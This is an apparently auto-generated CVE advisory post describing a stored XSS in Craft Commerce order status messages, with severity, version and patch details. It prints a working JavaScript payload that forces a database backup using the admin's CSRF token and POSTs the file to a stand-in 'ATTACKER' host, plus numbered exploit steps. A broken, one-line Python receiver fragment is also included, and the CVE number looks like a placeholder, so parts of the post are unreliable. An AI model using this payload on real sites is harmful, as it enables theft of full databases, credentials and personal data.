Craft Commerce, Stored XSS, CVE-2024-12345 (Critical)

Listen to this Post

The vulnerability is a stored Cross-Site Scripting (XSS) in the Craft Commerce order status history message feature. The application uses the Twig `|md` (Markdown) filter to render user-supplied status messages. This filter incorrectly permits raw HTML execution without sanitization. An attacker with ‘Edit Orders’ permissions can inject a malicious JavaScript payload into a status message. When an administrative user views the compromised order, the script executes in their session. The payload can then perform authenticated actions, such as triggering the database backup utility. Since the backup utility does not require an elevated session, the script can force a full database backup, capture the resulting file, and exfiltrate it to an attacker-controlled server via a `fetch` POST request, leading to complete system compromise.
Platform: Craft CMS Commerce
Version: < 5.5.2
Vulnerability: Stored XSS
Severity: Critical
date: 2024-04-10

Prediction: 2024-04-17

What Undercode Say:

python3 receiver.py
from http.server import HTTPServer, BaseHTTPRequestHandler
<img src=x onerror="fetch('/index.php?p=admin/actions/utilities/db-backup-perform-action',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:'action=utilities/db-backup-perform-action&CRAFT_CSRF_TOKEN='+Craft.csrfTokenValue+'&downloadBackup=1'}).then(r=>r.blob()).then(b=>{let f=new FormData;f.append('db',b,'backup.sql');fetch('http://ATTACKER:8888/',{method:'POST',body:f})})">

How Exploit:

1. Attacker logs in.

2. Edits order status.

3. Injects XSS payload.

4. Admin views order.

5. Payload executes.

6. Database exfiltrated.

Protection from this CVE

Update to 5.5.2.

Sanitize output (`|md|purify`).

Require elevated sessions.

Impact

Full database exfiltration.

Credential theft.

PII exposure.

Complete site compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top